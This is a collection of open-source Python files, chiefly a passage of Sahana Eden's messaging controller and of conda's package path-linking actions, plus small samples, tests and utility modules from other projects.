record.tweet_id)
script_url = "https://platform.twitter.com/widgets.js"
# Themeable Throbber
throbber = DIV(_class = "s3-twitter-throbber",
)
# Display throbber while Tweet loads
tweet_container = DIV(throbber,
_class = "s3-twitter-container",
)
tweet_user = TAG[""](A(_href = twitter_url,
_style = "display: none"),
)
# Configure Tweet display
attributes = {"_width": "350px",
"_data-conversation": "none",
"_class": "twitter-tweet",
"lang": record.lang,
}
tweet = TAG["blockquote"](tweet_container,
tweet_user,
SCRIPT(_src = script_url,
_charset = "utf-8"),
**attributes
)
# Insert tweet
output["item"] = tweet
return output
s3.postp = postp
return s3_rest_controller()
# -----------------------------------------------------------------------------
def sender():
"""
RESTful CRUD controller for whitelisting senders.
User can assign priority to senders.
"""
tablename = "msg_sender"
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Whitelisted Senders"),
title_list = T("Whitelisted Senders"),
label_create = T("Whitelist a Sender"),
title_update = T("Edit Sender Priority"),
label_list_button = T("View Sender Priority"),
msg_record_created = T("Sender Whitelisted"),
msg_record_deleted = T("Sender deleted"),
msg_list_empty = T("No Senders Whitelisted"),
msg_record_modified = T("Sender Priority updated"),
)
s3db.configure(tablename, listadd=True)
def prep(r):
if r.method == "create":
dsender = request.vars['sender']
dpriority = request.vars['priority']
r.table.sender.default = dsender
r.table.priority.default = dpriority
return True
s3.prep = prep
return s3_rest_controller()
# -----------------------------------------------------------------------------
def keyword():
""" REST Controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def parser():
"""
RESTful CRUD controller for Parsers
- appears in the administration menu
"""
if not auth.s3_has_role("ADMIN"):
auth.permission.fail()
def prep(r):
if r.interactive:
# CRUD Strings
s3.crud_strings["msg_parser"] = Storage(
title_display = T("Parser Connection Details"),
title_list = T("Parser Connections"),
label_create = T("Connect Parser"),
title_update = T("Edit Parser Connection"),
label_list_button = T("View Parser Connections"),
msg_record_created = T("Parser connected"),
msg_record_deleted = T("Parser connection removed"),
msg_record_modified = T("Parser connection updated"),
msg_list_empty = T("No Parsers currently connected"),
)
import inspect
import sys
from s3 import S3Represent
template = settings.get_msg_parser()
module_name = "applications.%s.modules.templates.%s.parser" % \
(appname, template)
__import__(module_name)
mymodule = sys.modules[module_name]
S3Parser = mymodule.S3Parser()
# Dynamic lookup of the parsing functions in S3Parser class.
parsers = inspect.getmembers(S3Parser, \
predicate=inspect.isfunction)
parse_opts = []
pappend = parse_opts.append
for p in parsers:
p = p[0]
# Filter out helper functions
if not p.startswith("_"):
pappend(p)
table = r.table
table.channel_id.requires = IS_ONE_OF(db, "msg_channel.channel_id",
S3Represent(lookup = "msg_channel"),
sort = True,
)
table.function_name.requires = IS_IN_SET(parse_opts,
zero = None)
return True
s3.prep = prep
def postp(r, output):
if r.interactive:
# Normal Action Buttons
s3_action_buttons(r)
# Custom Action Buttons for Enable/Disable
table = r.table
query = (table.deleted == False)
rows = db(query).select(table.id,
table.enabled,
)
restrict_e = [str(row.id) for row in rows if not row.enabled]
restrict_d = [str(row.id) for row in rows if row.enabled]
s3.actions += [{"label": s3_str(T("Enable")),
"restrict": restrict_e,
"url": URL(args=["[id]", "enable"]),
"_class": "action-btn",
},
{"label": s3_str(T("Disable")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "disable"]),
"_class": "action-btn",
},
]
if not s3task._is_alive():
# No Scheduler Running
s3.actions += [{"label": s3_str(T("Parse")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "parse"]),
"_class": "action-btn",
},
]
return output
s3.postp = postp
return s3_rest_controller()
# =============================================================================
# The following functions hook into the pr functions:
#
def group():
""" RESTful CRUD controller """
if auth.is_logged_in() or auth.basic():
pass
else:
redirect(URL(c="default", f="user",
args = "login",
vars = {"_next":URL(c="msg", f="group")},
))
table = s3db.pr_group
# Hide unnecessary fields
table.description.readable = table.description.writable = False
# Do not show system groups
s3.filter = (table.system == False)
return s3_rest_controller("pr", "group",
rheader = s3db.pr_rheader,
)
# -----------------------------------------------------------------------------
def group_membership():
""" RESTful CRUD controller """
if auth.is_logged_in() or auth.basic():
pass
else:
redirect(URL(c="default", f="user",
args = "login",
vars = {"_next": URL(c="msg", f="group_membership")},
))
table = s3db.pr_group_membership
# Hide unnecessary fields
table.comments.readable = table.comments.writable = False
table.group_head.readable = table.group_head.writable = False
return s3_rest_controller("pr", f)
# -----------------------------------------------------------------------------
def contacts():
"""
Allow the user to add, update and delete their contacts
- seems to be unused (was called 'contact' & was broken)
"""
table = s3db.pr_contact
#ptable = s3db.pr_person
if auth.is_logged_in() or auth.basic():
s3.filter = (table.pe_id == auth.user.pe_id)
else:
redirect(URL(c="default", f="user", args="login",
vars={"_next": URL(c="msg", f="contact")}))
# These fields will be populated automatically
table.name.writable = table.name.readable = False
table.pe_id.writable = table.pe_id.readable = False
table.person_name.writable = table.person_name.readable = False
table.id.writable = False
#table.id.readable = False
def msg_contact_onvalidation(form):
# Add the person id to the record
if auth.user:
form.vars.pe_id = auth.user.pe_id
s3db.configure(table._tablename,
onvalidation = msg_contact_onvalidation)
def prep(r):
# Restrict update and delete access to contacts not owned by the user
if r.id :
pe_id = r.record.pe_id
if auth.user and auth.user.pe_id == pe_id:
return True
else:
session.error = T("Access denied")
return {"bypass": True, "output": redirect(URL(r=request))}
else:
return True
s3.prep = prep
response.menu_options = []
return s3_rest_controller("pr", "contact")
# -----------------------------------------------------------------------------
def search():
"""
Do a search of groups which match a type
- used for auto-completion
"""
if not (auth.is_logged_in() or auth.basic()):
# Not allowed
return
# JQuery UI Autocomplete uses 'term' instead of 'value'
# (old JQuery Autocomplete uses 'q' instead of 'value')
value = request.vars.term or request.vars.q
if not value:
return
# Call the search function
type = get_vars.get("type", None)
if type:
items = person_search(value, type)
else:
items = person_search(value)
# Encode in JSON
item = json.dumps(items)
response.headers["Content-Type"] = "application/json"
return item
# -----------------------------------------------------------------------------
def recipient_represent(id, default_label=""):
""" Simplified output as-compared to pr_pentity_represent """
output = ""
table = s3db.pr_pentity
pe = db(table.pe_id == id).select(table.instance_type,
limitby = (0, 1),
).first()
if not pe:
return output
instance_type = pe.instance_type
table = db.get(instance_type, None)
if not table:
return output
if instance_type == "pr_person":
person = db(table.pe_id == id).select(table.first_name,
table.middle_name,
table.last_name,
limitby = (0, 1),
).first()
if person:
output = s3_fullname(person)
elif instance_type == "pr_group":
group = db(table.pe_id == id).select(table.name,
limitby = (0, 1),
).first()
if group:
output = group.name
return output
# -----------------------------------------------------------------------------
def person_search(value, type=None):
""" Search for People & Groups which match a search term """
# Shortcuts
groups = s3db.pr_group
persons = s3db.pr_person
items = []
# We want to do case-insensitive searches
# (default anyway on MySQL/SQLite, but not PostgreSQL)
value = value.lower()
if type:
represent = recipient_represent
else:
represent = s3db.pr_pentity_represent
if type == "pr_group" or not type:
# Check Groups
query = (groups["name"].lower().like("%" + value + "%")) & (groups.deleted == False)
rows = db(query).select(groups.pe_id)
for row in rows:
items.append({"id":row.pe_id, "name":represent(row.pe_id, default_label = "")})
if type == "pr_person" or not type:
# Check Persons
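        # NB A person whose first, middle & last names all match the term
        #    will be appended once per matching field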
deleted = (persons.deleted == False)
# First name
query = (persons["first_name"].lower().like("%" + value + "%")) & deleted
rows = db(query).select(persons.pe_id, cache=s3db.cache)
for row in rows:
items.append({"id":row.pe_id, "name":represent(row.pe_id, default_label = "")})
# Middle name
query = (persons["middle_name"].lower().like("%" + value + "%")) & deleted
rows = db(query).select(persons.pe_id, cache=s3db.cache)
for row in rows:
items.append({"id":row.pe_id, "name":represent(row.pe_id, default_label = "")})
# Last name
query = (persons["last_name"].lower().like("%" + value + "%")) & deleted
rows = db(query).select(persons.pe_id, cache=s3db.cache)
for row in rows:
items.append({"id":row.pe_id, "name":represent(row.pe_id, default_label = "")})
return items
# -----------------------------------------------------------------------------
def subscription():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
# Send Outbound Messages (was for being called via cron, now useful for debugging)
# -----------------------------------------------------------------------------
def process_email_outbox():
""" Send Pending Email Messages """
msg.process_outbox(contact_method = "EMAIL")
# -----------------------------------------------------------------------------
def process_sms_outbox():
""" Send Pending SMS Messages """
msg.process_outbox(contact_method = "SMS")
# -----------------------------------------------------------------------------
def process_twitter_outbox():
""" Send Pending Twitter Messages """
msg.process_outbox(contact_method = "TWITTER")
# =============================================================================
# Enabled only for testing:
#
@auth.s3_requires_membership(1)
def facebook_post():
""" Post to Facebook """
title = T("Post to Facebook")
# Test the formstyle
formstyle = s3.crud.formstyle
row = formstyle("test", "test", "test", "test")
if isinstance(row, tuple):
# Formstyle with separate row for label (e.g. default Eden formstyle)
tuple_rows = True
else:
# Formstyle with just a single row (e.g. Bootstrap, Foundation or DRRPP)
tuple_rows = False
form_rows = []
comment = ""
_id = "channel_id"
label = LABEL("%s:" % T("Channel"))
table = s3db.msg_facebook_channel
query = (table.deleted == False) & \
(table.enabled == True)
rows = db(query).select(table.channel_id, table.name)
options = [OPTION(row.name, _value=row.channel_id) for row in rows]
channel_select = SELECT(_name = "channel_id",
_id = _id,
*options
)
widget = channel_select
row = formstyle("%s__row" % _id, label, widget, comment)
if tuple_rows:
form_rows.append(row[0])
form_rows.append(row[1])
else:
form_rows.append(row)
_id = "post"
label = LABEL("%s:" % T("Contents"))
widget = TEXTAREA(_name = "post",
)
row = formstyle("%s__row" % _id, label, widget, comment)
if tuple_rows:
form_rows.append(row[0])
form_rows.append(row[1])
else:
form_rows.append(row)
_id = "submit"
label = ""
widget = INPUT(_type="submit", _value=T("Post"))
row = formstyle("%s__row" % _id, label, widget, comment)
if tuple_rows:
form_rows.append(row[0])
form_rows.append(row[1])
else:
form_rows.append(row)
if tuple_rows:
# Assume TRs
form = FORM(TABLE(*form_rows))
else:
form = FORM(*form_rows)
if form.accepts(request.vars, session):
form_vars = form.vars
channel_id = form_vars.get("channel_id")
post = form_vars.get("post")
if channel_id and post:
msg.post_to_facebook(post, channel_id)
output = {"form": form,
"title": title,
}
return output
# =============================================================================
# Enabled only for testing:
#
@auth.s3_requires_membership(1)
def twitter_post():
""" Post to Twitter """
title = T("Post to Twitter")
# Test the formstyle
formstyle = s3.crud.formstyle
row = formstyle("test", "test", "test", "test")
if isinstance(row, tuple):
# Formstyle with separate row for label (e.g. default Eden formstyle)
tuple_rows = True
else:
# Formstyle with just a single row (e.g. Bootstrap, Foundation or DRRPP)
tuple_rows = False
form_rows = []
comment = ""
_id = "channel_id"
label = LABEL("%s:" % T("Channel"))
table = s3db.msg_twitter_channel
query = (table.deleted == False) & \
(table.enabled == True)
rows = db(query).select(table.channel_id, table.name)
options = [OPTION(row.name, _value=row.channel_id) for row in rows]
channel_select = SELECT(_name = "channel_id",
_id = _id,
*options
)
widget = channel_select
row = formstyle("%s__row" % _id, label, widget, comment)
if tuple_rows:
form_rows.append(row[0])
form_rows.append(row[1])
else:
form_rows.append(row)
_id = "post"
label = LABEL("%s:" % T("Contents"))
widget = TEXTAREA(_name = "post",
)
row = formstyle("%s__row" % _id, label, widget, comment)
if tuple_rows:
form_rows.append(row[0])
form_rows.append(row[1])
else:
form_rows.append(row)
_id = "submit"
label = ""
widget = INPUT(_type="submit", _value=T("Post"))
row = formstyle("%s__row" % _id, label, widget, comment)
if tuple_rows:
form_rows.append(row[0])
form_rows.append(row[1])
else:
form_rows.append(row)
if tuple_rows:
# Assume TRs
form = FORM(TABLE(*form_rows))
else:
form = FORM(*form_rows)
if form.accepts(request.vars, session):
form_vars = form.vars
channel_id = form_vars.get("channel_id")
post = form_vars.get("post")
if channel_id and post:
msg.send_tweet(post)
output = {"form": form,
"title": title,
}
return output
# =============================================================================
# Enabled only for testing:
#
@auth.s3_requires_membership(1)
def tag():
""" RESTful CRUD controller """
return s3_rest_controller()
# =============================================================================
# Enabled only for testing:
#
def readKeyGraph(queryID):
""" """
import os
curpath = os.getcwd()
f = open("%s.txt" % queryID, "r")
topics = int(next(f))
nodelabel = {}
E = []
nodetopic = {}
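    # Expected file layout (as parsed below): first line = number of topics;
    # for each topic: a "KEYGRAPH_NODES:<n>" line, then <n> "id:label1:label2" node lines,
    # a "KEYGRAPH_EDGES:<m>" line, then <m> "node1 node2" edge lines (each edge appears
    # to be listed twice, hence the halving), followed by two separator lines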
for x in range(0, topics):
thisnodes = []
nodes = int(next(f).split("KEYGRAPH_NODES:")[1])
for y in range(0, nodes):
s = next(f)
nodeid = s.split(":")[0]
nodetopic[str(nodeid)] = x
l1 = s.split(":")[1]
l2 = s.split(":")[2]
            try:
                # unicode() is Python-2-only; s3_str is used elsewhere in this controller
                nodelabel[str(nodeid)] = s3_str(l2.strip())
            except Exception:
                pass
edges = int(next(f).split("KEYGRAPH_EDGES:")[1])
        edges = edges // 2
for y in range(0,edges):
s = next(f)
n1 = s.split(" ")[0].strip()
n2 = s.split(" ")[1].strip()
if (n1 in nodelabel.keys()) and (n2 in nodelabel.keys()):
E.append((str(n1), str(n2)))
next(f)
next(f)
"""
for x in range(0,len(E)):
lx = list(E[x])
lx.append((nodetopic[E[x][0]] - nodetopic[E[x][1]] + 3)*100)
E[x] = tuple(lx)
"""
#import networkx as nx
from igraph import Graph, write_svg
#g = nx.Graph()
g = Graph()
g.add_vertices([ str(s) for s in nodelabel.keys()])
#g.add_nodes_from(nodelabel)
g.add_edges(E)
g.vs["name"] = list(nodelabel.values())
g.vs["label"] = g.vs["name"]
g.vs["doc_id"] = list(nodelabel.keys())
layout = g.layout_lgl()
#layout = g.layout_kamada_kawai()
visual_style = {}
visual_style["vertex_size"] = 20
#visual_style["vertex_color"] = [color_dict[gender] for gender in g.vs["gender"]]
visual_style["vertex_label"] = g.vs["name"]
#visual_style["edge_width"] = [1 + 2 * int(len(is_formal)) for is_formal in g.vs["label"]]
visual_style["layout"] = layout
visual_style["bbox"] = (2000, 2000)
visual_style["margin"] = 20
#plot(g, **visual_style)
#c = g.clusters().subgraphs()
filename = "%s.svg" % queryID
write_svg(g.community_fastgreedy().as_clustering().graph, layout=layout, **visual_style)
#plot(g.community_fastgreedy().as_clustering(), layout=layout)
#plot(g)
#g.add_weighted_edges_from(E)
#nx.relabel_nodes(g, nodelabel, copy=False)
#nx.draw(g, node_size=100, font_size=8, edge_size=10000)
#labels = nx.draw_networkx_labels(g,pos=nx.spring_layout(g),labels=nodelabel)
#import matplotlib.pyplot as plt
#plt.savefig('kg3.png', facecolor='w', edgecolor='w',orientation='portrait', papertype=None, format=None,transparent=False, bbox_inches=None, pad_inches=0.1)
#plt.show()
# END ================================================================================
|
flavour/eden
|
controllers/msg.py
|
Python
|
mit
| 87,816
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for GetTestCase
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-dialogflowcx
# [START dialogflow_v3_generated_TestCases_GetTestCase_async]
from google.cloud import dialogflowcx_v3
async def sample_get_test_case():
# Create a client
client = dialogflowcx_v3.TestCasesAsyncClient()
# Initialize request argument(s)
request = dialogflowcx_v3.GetTestCaseRequest(
name="name_value",
)
# Make the request
response = await client.get_test_case(request=request)
# Handle the response
print(response)
# [END dialogflow_v3_generated_TestCases_GetTestCase_async]
|
googleapis/python-dialogflow-cx
|
samples/generated_samples/dialogflow_v3_generated_test_cases_get_test_case_async.py
|
Python
|
apache-2.0
| 1,463
|
from data_collection.management.commands import BaseHalaroseCsvImporter
class Command(BaseHalaroseCsvImporter):
council_id = 'E07000061'
addresses_name = 'parl.2017-06-08/Version 1/Eastbourne polling_station_export-2017-05-25.csv'
stations_name = 'parl.2017-06-08/Version 1/Eastbourne polling_station_export-2017-05-25.csv'
elections = ['parl.2017-06-08']
|
chris48s/UK-Polling-Stations
|
polling_stations/apps/data_collection/management/commands/import_eastbourne.py
|
Python
|
bsd-3-clause
| 387
|
from bears.c_languages.CPPLintBear import CPPLintBear
from coalib.testing.LocalBearTestHelper import verify_local_bear
test_file = """
int main() {
return 0;
}
"""
test_file2 = ('int main() {\n' +
' int x;\n' +
' x = 3;' * 100 + '\n'
' return 0;\n' +
'}\n')
CPPLintBearTest = verify_local_bear(CPPLintBear,
valid_files=(),
invalid_files=(test_file,),
tempfile_kwargs={'suffix': '.cpp'})
CPPLintBearIgnoreConfigTest = verify_local_bear(
CPPLintBear,
valid_files=(test_file,),
invalid_files=(),
settings={'cpplint_ignore': 'legal/copyright'},
tempfile_kwargs={'suffix': '.cpp'})
CPPLintBearLineLengthConfigTest = verify_local_bear(
CPPLintBear,
valid_files=(),
invalid_files=(test_file,),
settings={'cpplint_ignore': 'legal/copyright',
'max_line_length': '13'},
tempfile_kwargs={'suffix': '.cpp'})
CPPLintBearInfiniteLineLengthTest = verify_local_bear(
CPPLintBear,
valid_files=(test_file2,),
invalid_files=(),
settings={'max_line_length': '0',
'cpplint_ignore': 'legal/copyright'},
tempfile_kwargs={'suffix': '.cpp'})
|
coala-analyzer/coala-bears
|
tests/c_languages/CPPLintBearTest.py
|
Python
|
agpl-3.0
| 1,288
|
from golem.rpc.mapping.aliases import *
GUI_EVENT_MAP = dict(
    config_changed=Environment.evt_opts_changed,
    test_task_status=Task.evt_task_test_status,
    task_status_changed=Task.evt_task_status,
    connection_status_changed=Network.evt_connection,
    lock_config=UI.evt_lock_config,
)
|
scorpilix/Golemtest
|
golem/rpc/mapping/gui.py
|
Python
|
gpl-3.0
| 371
|
from .classes import Check, Is
|
csparpa/check
|
fluentcheck/__init__.py
|
Python
|
mit
| 31
|
import json
def readJSON(json_file_path):
    with open(json_file_path, 'r') as json_file:
        return json.load(json_file)
if __name__ == '__main__':
    print(readJSON('../../data/gen_hierarchies/SexGH.json'))
|
cassinius/mlhi-ass2-anonymization
|
src/io/jsonInput.py
|
Python
|
apache-2.0
| 206
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
from abc import ABCMeta, abstractmethod, abstractproperty
from errno import EXDEV
from logging import getLogger
from os.path import basename, dirname, getsize, join
import re
from uuid import uuid4
from .envs_manager import USER_ENVIRONMENTS_TXT_FILE, register_env, unregister_env
from .portability import _PaddingError, update_prefix
from .prefix_data import PrefixData
from .._vendor.auxlib.compat import with_metaclass
from .._vendor.auxlib.ish import dals
from ..base.constants import CONDA_TARBALL_EXTENSION
from ..base.context import context
from ..common.compat import iteritems, on_win, text_type
from ..common.path import (get_bin_directory_short_path, get_leaf_directories,
get_python_noarch_target_path, get_python_short_path,
parse_entry_point_def,
pyc_path, url_to_path, win_path_ok)
from ..common.url import has_platform, path_to_url, unquote
from ..exceptions import CondaUpgradeError, CondaVerificationError, PaddingError, SafetyError
from ..gateways.connection.download import download
from ..gateways.disk.create import (compile_pyc, copy, create_hard_link_or_copy,
create_link, create_python_entry_point, extract_tarball,
make_menu, write_as_json_to_file)
from ..gateways.disk.delete import rm_rf, try_rmdir_all_empty
from ..gateways.disk.permissions import make_writable
from ..gateways.disk.read import (compute_md5sum, compute_sha256sum, islink, lexists,
read_index_json)
from ..gateways.disk.update import backoff_rename, touch
from ..history import History
from ..models.channel import Channel
from ..models.enums import LinkType, NoarchType, PathType
from ..models.match_spec import MatchSpec
from ..models.records import (Link, PackageCacheRecord, PackageRecord, PathDataV1, PathsData,
PrefixRecord)
try:
from cytoolz.itertoolz import concat, concatv
except ImportError: # pragma: no cover
from .._vendor.toolz.itertoolz import concat, concatv # NOQA
log = getLogger(__name__)
REPR_IGNORE_KWARGS = (
'transaction_context',
'package_info',
'hold_path',
)
@with_metaclass(ABCMeta)
class PathAction(object):
_verified = False
@abstractmethod
def verify(self):
# if verify fails, it should return an exception object rather than raise
# at the end of a verification run, all errors will be raised as a CondaMultiError
# after successful verification, the verify method should set self._verified = True
raise NotImplementedError()
@abstractmethod
def execute(self):
raise NotImplementedError()
@abstractmethod
def reverse(self):
raise NotImplementedError()
@abstractmethod
def cleanup(self):
raise NotImplementedError()
@abstractproperty
def target_full_path(self):
raise NotImplementedError()
@property
def verified(self):
return self._verified
def __repr__(self):
args = ('%s=%r' % (key, value) for key, value in iteritems(vars(self))
if key not in REPR_IGNORE_KWARGS)
return "%s(%s)" % (self.__class__.__name__, ', '.join(args))
@with_metaclass(ABCMeta)
class PrefixPathAction(PathAction):
def __init__(self, transaction_context, target_prefix, target_short_path):
self.transaction_context = transaction_context
self.target_prefix = target_prefix
self.target_short_path = target_short_path
@property
def target_full_path(self):
trgt, shrt_pth = self.target_prefix, self.target_short_path
if trgt is not None and shrt_pth is not None:
return join(trgt, win_path_ok(shrt_pth))
else:
return None
# ######################################################
# Creation of Paths within a Prefix
# ######################################################
@with_metaclass(ABCMeta)
class CreateInPrefixPathAction(PrefixPathAction):
# All CreatePathAction subclasses must create a SINGLE new path
# the short/in-prefix version of that path must be returned by execute()
def __init__(self, transaction_context, package_info, source_prefix, source_short_path,
target_prefix, target_short_path):
super(CreateInPrefixPathAction, self).__init__(transaction_context,
target_prefix, target_short_path)
self.package_info = package_info
self.source_prefix = source_prefix
self.source_short_path = source_short_path
def verify(self):
self._verified = True
def cleanup(self):
# create actions typically won't need cleanup
pass
@property
def source_full_path(self):
prfx, shrt_pth = self.source_prefix, self.source_short_path
return join(prfx, win_path_ok(shrt_pth)) if prfx and shrt_pth else None
# @with_metaclass(ABCMeta)
# class CreateLeasedPathAction(CreateInPrefixPathAction):
# def __init__(self, transaction_context, package_info, source_prefix, source_short_path,
# target_prefix, target_short_path):
# super(CreateLeasedPathAction, self).__init__(transaction_context, package_info,
# source_prefix, source_short_path,
# target_prefix, target_short_path)
# self.leased_path_entry = LeasedPathEntry(
# _path=target_short_path,
# target_path=self.source_full_path,
# target_prefix=source_prefix,
# leased_path=self.target_full_path,
# package_name=package_info.index_json_record.name,
# leased_path_type=self.leased_path_type,
# )
# self._execute_successful = False
#
# def reverse(self):
# if self._execute_successful:
# log.trace("reversing leased path creation %s", self.target_full_path)
# rm_rf(self.target_full_path)
#
# @abstractproperty
# def leased_path_type(self):
# raise NotImplementedError()
class LinkPathAction(CreateInPrefixPathAction):
@classmethod
def create_file_link_actions(cls, transaction_context, package_info, target_prefix,
requested_link_type):
def get_prefix_replace(source_path_data):
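            # Decide how this file should be materialised in the target prefix:
            # force a copy (instead of the requested link type) for softlinks,
            # for files embedding a prefix placeholder, and for files marked
            # no_link; returns the (link_type, prefix_placeholder, file_mode)
            # triple consumed by make_file_link_action below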
            if source_path_data.path_type == PathType.softlink:
                link_type = LinkType.copy
                prefix_placeholder, file_mode = '', None
            elif source_path_data.prefix_placeholder:
                link_type = LinkType.copy
                prefix_placeholder = source_path_data.prefix_placeholder
                file_mode = source_path_data.file_mode
            elif source_path_data.no_link:
                link_type = LinkType.copy
                prefix_placeholder, file_mode = '', None
            else:
                link_type = requested_link_type
                prefix_placeholder, file_mode = '', None
            return link_type, prefix_placeholder, file_mode
def make_file_link_action(source_path_data):
# TODO: this inner function is still kind of a mess
noarch = package_info.index_json_record.noarch
if noarch == NoarchType.python:
sp_dir = transaction_context['target_site_packages_short_path']
target_short_path = get_python_noarch_target_path(source_path_data.path, sp_dir)
elif noarch is None or noarch == NoarchType.generic:
target_short_path = source_path_data.path
else:
raise CondaUpgradeError(dals("""
The current version of conda is too old to install this package.
Please update conda."""))
link_type, placeholder, fmode = get_prefix_replace(source_path_data)
if placeholder:
return PrefixReplaceLinkAction(transaction_context, package_info,
package_info.extracted_package_dir,
source_path_data.path,
target_prefix, target_short_path,
requested_link_type,
placeholder, fmode, source_path_data)
else:
return LinkPathAction(transaction_context, package_info,
package_info.extracted_package_dir, source_path_data.path,
target_prefix, target_short_path,
link_type, source_path_data)
return tuple(make_file_link_action(spi) for spi in package_info.paths_data.paths)
@classmethod
def create_directory_actions(cls, transaction_context, package_info, target_prefix,
requested_link_type, file_link_actions):
leaf_directories = get_leaf_directories(axn.target_short_path for axn in file_link_actions)
return tuple(
cls(transaction_context, package_info, None, None,
target_prefix, directory_short_path, LinkType.directory, None)
for directory_short_path in leaf_directories
)
@classmethod
def create_python_entry_point_windows_exe_action(cls, transaction_context, package_info,
target_prefix, requested_link_type,
entry_point_def):
source_directory = context.conda_prefix
source_short_path = 'Scripts/conda.exe'
command, _, _ = parse_entry_point_def(entry_point_def)
target_short_path = "Scripts/%s.exe" % command
source_path_data = PathDataV1(
_path=target_short_path,
path_type=PathType.windows_python_entry_point_exe,
)
return cls(transaction_context, package_info, source_directory,
source_short_path, target_prefix, target_short_path,
requested_link_type, source_path_data)
def __init__(self, transaction_context, package_info,
extracted_package_dir, source_short_path,
target_prefix, target_short_path, link_type, source_path_data):
super(LinkPathAction, self).__init__(transaction_context, package_info,
extracted_package_dir, source_short_path,
target_prefix, target_short_path)
self.link_type = link_type
self._execute_successful = False
self.source_path_data = source_path_data
self.prefix_path_data = None
def verify(self):
if self.link_type != LinkType.directory and not lexists(self.source_full_path): # pragma: no cover # NOQA
return CondaVerificationError(dals("""
The package for %s located at %s
appears to be corrupted. The path '%s'
specified in the package manifest cannot be found.
""" % (self.package_info.index_json_record.name,
self.package_info.extracted_package_dir,
self.source_short_path)))
source_path_data = self.source_path_data
try:
source_path_type = source_path_data.path_type
except AttributeError:
source_path_type = None
if source_path_type in PathType.basic_types:
            # this lets us keep the non-generic path types like windows_python_entry_point_exe
source_path_type = None
if self.link_type == LinkType.directory:
self.prefix_path_data = None
elif self.link_type == LinkType.softlink:
self.prefix_path_data = PathDataV1.from_objects(
self.source_path_data,
path_type=source_path_type or PathType.softlink,
)
elif self.link_type == LinkType.copy and source_path_data.path_type == PathType.softlink:
self.prefix_path_data = PathDataV1.from_objects(
self.source_path_data,
path_type=source_path_type or PathType.softlink,
)
elif source_path_data.path_type == PathType.hardlink:
try:
reported_sha256 = source_path_data.sha256
except AttributeError:
reported_sha256 = None
source_sha256 = compute_sha256sum(self.source_full_path)
if reported_sha256 and reported_sha256 != source_sha256:
return SafetyError(dals("""
The package for %s located at %s
appears to be corrupted. The path '%s'
has a sha256 mismatch.
reported sha256: %s
actual sha256: %s
""" % (self.package_info.index_json_record.name,
self.package_info.extracted_package_dir,
self.source_short_path,
reported_sha256,
source_sha256,
)))
try:
reported_size_in_bytes = source_path_data.size_in_bytes
except AttributeError:
reported_size_in_bytes = None
if reported_size_in_bytes:
source_size_in_bytes = getsize(self.source_full_path)
if reported_size_in_bytes != source_size_in_bytes:
return SafetyError(dals("""
The package for %s located at %s
appears to be corrupted. The path '%s'
has an incorrect size.
reported size: %s bytes
actual size: %s bytes
""" % (self.package_info.index_json_record.name,
self.package_info.extracted_package_dir,
self.source_short_path,
reported_size_in_bytes,
source_size_in_bytes,
)))
self.prefix_path_data = PathDataV1.from_objects(
source_path_data,
sha256=reported_sha256,
sha256_in_prefix=reported_sha256,
path_type=source_path_type or PathType.hardlink,
)
elif source_path_data.path_type == PathType.windows_python_entry_point_exe:
self.prefix_path_data = source_path_data
else:
raise NotImplementedError()
self._verified = True
def execute(self):
log.trace("linking %s => %s", self.source_full_path, self.target_full_path)
create_link(self.source_full_path, self.target_full_path, self.link_type,
force=context.force)
self._execute_successful = True
def reverse(self):
if self._execute_successful:
log.trace("reversing link creation %s", self.target_prefix)
if self.link_type == LinkType.directory:
try_rmdir_all_empty(self.target_full_path)
else:
rm_rf(self.target_full_path)
class PrefixReplaceLinkAction(LinkPathAction):
def __init__(self, transaction_context, package_info,
extracted_package_dir, source_short_path,
target_prefix, target_short_path,
link_type,
prefix_placeholder, file_mode, source_path_data):
        # This link_type is used in execute(). Make sure we always respect a LinkType.copy request.
link_type = LinkType.copy if link_type == LinkType.copy else LinkType.hardlink
super(PrefixReplaceLinkAction, self).__init__(transaction_context, package_info,
extracted_package_dir, source_short_path,
target_prefix, target_short_path,
link_type, source_path_data)
self.prefix_placeholder = prefix_placeholder
self.file_mode = file_mode
self.intermediate_path = None
def verify(self):
validation_error = super(PrefixReplaceLinkAction, self).verify()
if validation_error:
return validation_error
if islink(self.source_full_path):
log.trace("ignoring prefix update for symlink with source path %s",
self.source_full_path)
# return
assert False, "I don't think this is the right place to ignore this"
self.intermediate_path = join(self.transaction_context['temp_dir'], text_type(uuid4()))
log.trace("copying %s => %s", self.source_full_path, self.intermediate_path)
create_link(self.source_full_path, self.intermediate_path, LinkType.copy)
make_writable(self.intermediate_path)
try:
log.trace("rewriting prefixes in %s", self.target_full_path)
update_prefix(self.intermediate_path,
context.target_prefix_override or self.target_prefix,
self.prefix_placeholder,
self.file_mode)
except _PaddingError:
raise PaddingError(self.target_full_path, self.prefix_placeholder,
len(self.prefix_placeholder))
sha256_in_prefix = compute_sha256sum(self.intermediate_path)
self.prefix_path_data = PathDataV1.from_objects(
self.prefix_path_data,
file_mode=self.file_mode,
path_type=PathType.hardlink,
prefix_placeholder=self.prefix_placeholder,
sha256_in_prefix=sha256_in_prefix,
)
self._verified = True
def execute(self):
if not self._verified:
self.verify()
source_path = self.intermediate_path or self.source_full_path
log.trace("linking %s => %s", source_path, self.target_full_path)
create_link(source_path, self.target_full_path, self.link_type)
self._execute_successful = True
class MakeMenuAction(CreateInPrefixPathAction):
@classmethod
def create_actions(cls, transaction_context, package_info, target_prefix, requested_link_type):
if on_win and context.shortcuts:
MENU_RE = re.compile(r'^menu/.*\.json$', re.IGNORECASE)
return tuple(cls(transaction_context, package_info, target_prefix, spi.path)
